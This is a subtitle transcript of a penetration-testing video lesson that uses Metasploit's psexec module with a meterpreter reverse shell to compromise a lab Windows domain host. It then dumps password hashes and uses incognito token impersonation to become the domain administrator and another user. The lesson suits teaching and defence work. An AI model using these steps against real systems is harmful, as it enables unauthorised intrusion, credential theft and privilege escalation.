1
00:00:00,150 --> 00:00:06,190
Now to perform this attack with token impersonation, we're first gonna have to use Metasploit.

2
00:00:06,280 --> 00:00:09,030
Let's go ahead and just type in msfconsole.

3
00:00:09,210 --> 00:00:13,890
We're gonna load this guy up and then we're going to go ahead and search for psexec.

4
00:00:13,890 --> 00:00:18,060
We're gonna get a shell on the Frank Castle machine, or the Punisher machine.

5
00:00:18,060 --> 00:00:26,620
So I'm just gonna say use exploit/windows/smb/psexec, because I have it memorized here, and we're gonna

6
00:00:26,640 --> 00:00:34,570
say options, and then we're gonna set our RHOSTS, which should be the Punisher machine. Mine's

7
00:00:34,570 --> 00:00:37,140
.57.141.

8
00:00:37,150 --> 00:00:48,820
We're gonna set the SMBDomain, which is going to be marvel.local, set SMBPass as Password1, set SMB

9
00:00:48,820 --> 00:00:56,500
user as fcastle, and let's go ahead and show targets. Once you have that all set up, do a show targets

10
00:00:58,290 --> 00:01:05,640
and I'm going to do a native upload, so we'll set target to 2. I'm going to type options here and I'll

11
00:01:05,640 --> 00:01:10,260
stall verbally just for a second so you can catch up if you need to, but we're just making sure that

12
00:01:10,260 --> 00:01:16,470
everything is checked with our boxes: we've got the right RHOST, we've got the right domain, password,

13
00:01:16,530 --> 00:01:22,560
user, native upload. Last thing, we're gonna want to set the payload here, because it's going to try to

14
00:01:22,560 --> 00:01:30,750
attack with an x86 payload, so we're gonna go ahead and say windows/x64 and we'll say meterpreter/reverse_

15
00:01:31,080 --> 00:01:42,610
tcp. Options, set the LHOST here to eth0, and now we have options one more time. It should look good:

16
00:01:42,650 --> 00:01:48,920
we've got 192.168.57.139 is the host, that is us. Well, OK, let's try to run this.

17
00:01:50,950 --> 00:01:59,200
And boom, meterpreter session right off the bat, that's what I love to see. OK, so now we have a meterpreter session,

18
00:01:59,740 --> 00:02:04,150
we can do all the fun stuff we saw earlier, you know: we can do a hashdump, we could say getuid,

19
00:02:04,150 --> 00:02:11,410
we can make sure we're SYSTEM, could say sysinfo, get the system info, we're on the right machine, right

20
00:02:11,440 --> 00:02:14,060
architecture, right everything. This is great.

21
00:02:14,080 --> 00:02:16,830
Now there are a few things that we can do in here.

22
00:02:16,840 --> 00:02:23,740
One is we can go ahead and we can load a tool, and if you type load and double tab, there's a few different

23
00:02:23,740 --> 00:02:26,030
things that we can use in here.

24
00:02:26,190 --> 00:02:34,290
Now we can load the tool that we're going to use, which is incognito. We can also use kiwi, which is a

25
00:02:34,290 --> 00:02:38,520
tool similar to mimikatz, which is made for dumping passwords. I'm going to talk about mimikatz here

26
00:02:38,520 --> 00:02:44,220
very, very soon. We can also load powershell. I love this feature, because sometimes if we get into a shell

27
00:02:44,220 --> 00:02:51,890
and we try to load PowerShell, like if we go into a shell, we say powershell, whatever, -ExecutionPolicy

28
00:02:51,930 --> 00:02:58,890
Bypass, and try to run that, it doesn't always run. This one's nice and neat for us; it's not always like

29
00:02:58,890 --> 00:03:04,440
that. So we're gonna go ahead and cancel this, or exit out of this channel, but we can load powershell

30
00:03:04,440 --> 00:03:06,320
into this and inject PowerShell as well.

31
00:03:06,330 --> 00:03:12,780
So these different features here are really nice, but for this one I'm gonna go ahead and load the incognito

32
00:03:12,780 --> 00:03:18,270
feature, and if we type help, the last thing that we loaded is always at the bottom, so if you ever want

33
00:03:18,270 --> 00:03:24,570
to see that, down here: incognito commands. Now I've had incognito come up on interviews before, so this

34
00:03:24,570 --> 00:03:31,770
is a special one to note, and just to understand what token impersonation is and why it's important. So

35
00:03:32,280 --> 00:03:39,660
we have the ability here to impersonate a token. Once we have a token impersonated, we can try to add,

36
00:03:40,410 --> 00:03:46,860
add a user, add group, add local groups, we can do all kinds of fun stuff. For this example we're just gonna

37
00:03:46,860 --> 00:03:54,710
go ahead and just try to impersonate a user, OK? And I'm going to go ahead and just list the tokens, and

38
00:03:54,740 --> 00:03:56,000
I'm going to do a -u.

39
00:03:56,000 --> 00:03:58,640
You could do it by -u, or -g for groups.

40
00:03:58,640 --> 00:03:59,820
I always like to do it for -u,

41
00:03:59,820 --> 00:04:08,220
and you can see sitting on this machine here is MARVEL\administrator, so if we want to impersonate

42
00:04:08,250 --> 00:04:14,130
this person, all we have to say is impersonate_token, and then we're gonna go ahead and just say MARVEL\\

43
00:04:15,720 --> 00:04:17,130
administrator.

44
00:04:17,130 --> 00:04:18,360
Just like that.

45
00:04:18,360 --> 00:04:23,720
You want two backslashes because of character escaping.

46
00:04:23,770 --> 00:04:26,110
Now we've impersonated this user.

47
00:04:26,110 --> 00:04:28,070
Go ahead and type shell.

48
00:04:28,210 --> 00:04:29,510
whoami.

49
00:04:29,510 --> 00:04:36,940
And you see now we are MARVEL\administrator. So one thing to note: Ctrl+C, exit out of this.

50
00:04:36,940 --> 00:04:40,390
We can go ahead and say, like, you want to run hashdump.

51
00:04:40,390 --> 00:04:45,670
Now it's going to have issues and say access is denied, because we're not actually running as the SYSTEM

52
00:04:45,670 --> 00:04:46,700
of the machine.

53
00:04:46,720 --> 00:04:51,790
So if you're ever in this situation, all you have to do is type rev2self, so you can revert to your

54
00:04:52,090 --> 00:04:57,490
old self, who you came in as, and then now you can run hashdump again and it'll work.

55
00:04:58,630 --> 00:05:00,870
So let's do one more proof of concept here.

56
00:05:00,870 --> 00:05:05,430
You saw the token that was available for you; it might have been your other user, right?

57
00:05:05,440 --> 00:05:10,690
It's whoever is logged in currently. I didn't instruct you on who to log in as, so on my Windows 10

58
00:05:10,690 --> 00:05:14,500
machine right now I've got the MARVEL administrator logged in.

59
00:05:14,570 --> 00:05:21,130
Let's go ahead and just sign in with fcastle and let's just put in Password1. Get Frank all logged

60
00:05:21,130 --> 00:05:25,330
in here, and get your other user logged in, whoever it is.

61
00:05:25,330 --> 00:05:27,250
If you had somebody you impersonated,

62
00:05:27,250 --> 00:05:29,530
go ahead and impersonate a different user here.

63
00:05:29,950 --> 00:05:38,440
So now we can come into this again and we can say list_tokens -u for user, and guess who just

64
00:05:38,440 --> 00:05:39,750
showed up.

65
00:05:39,960 --> 00:05:41,400
Frank Castle. Why?

66
00:05:41,460 --> 00:05:46,780
This is a delegate token. Remember, delegate tokens are on logins or RDP sessions.

67
00:05:46,890 --> 00:05:49,030
So we had a login on this computer.

68
00:05:49,050 --> 00:05:54,020
Now we've got this token; this token exists until the computer is rebooted.

69
00:05:54,210 --> 00:06:00,030
We can impersonate this user until the computer is rebooted, so we can go ahead and say impersonate_

70
00:06:00,090 --> 00:06:06,620
token and say MARVEL\\fcastle. Like this, it should work.

71
00:06:06,670 --> 00:06:08,360
Go ahead and say shell.

72
00:06:08,380 --> 00:06:09,460
whoami.

73
00:06:09,460 --> 00:06:10,000
Guess what.

74
00:06:10,000 --> 00:06:11,570
Now we're fcastle.

75
00:06:11,680 --> 00:06:12,840
This one is so cool.

76
00:06:12,850 --> 00:06:13,900
I love this attack.

77
00:06:14,350 --> 00:06:15,490
So that's it.

78
00:06:15,490 --> 00:06:19,440
I just want you to get the feel for what you're capable of doing.

79
00:06:19,450 --> 00:06:26,680
We just took a user that just happened to have left a token behind, and this happens a lot.

80
00:06:26,680 --> 00:06:31,260
Think of an account, or a server that you might log into or get access to.

81
00:06:31,450 --> 00:06:37,760
And there is a domain admin who logged into that computer, and servers don't get rebooted that much.

82
00:06:37,870 --> 00:06:42,760
So if there's a domain admin on that computer and they don't reboot very often, that token's sitting

83
00:06:42,760 --> 00:06:43,690
there until they reboot.

84
00:06:44,410 --> 00:06:47,460
So it's just moving laterally, machine to machine.

85
00:06:47,460 --> 00:06:51,130
And so you find that way to escalate, and this is a potential way to escalate.

86
00:06:51,580 --> 00:06:52,360
So that's it.

87
00:06:52,360 --> 00:06:57,300
We're going to move on to talk about the mitigation strategies for this, and then we can talk about Kerberoasting,

88
00:06:57,300 --> 00:06:59,730
which is one of my favorite attacks.

89
00:06:59,800 --> 00:07:01,720
So I'll go ahead and catch you in the next video.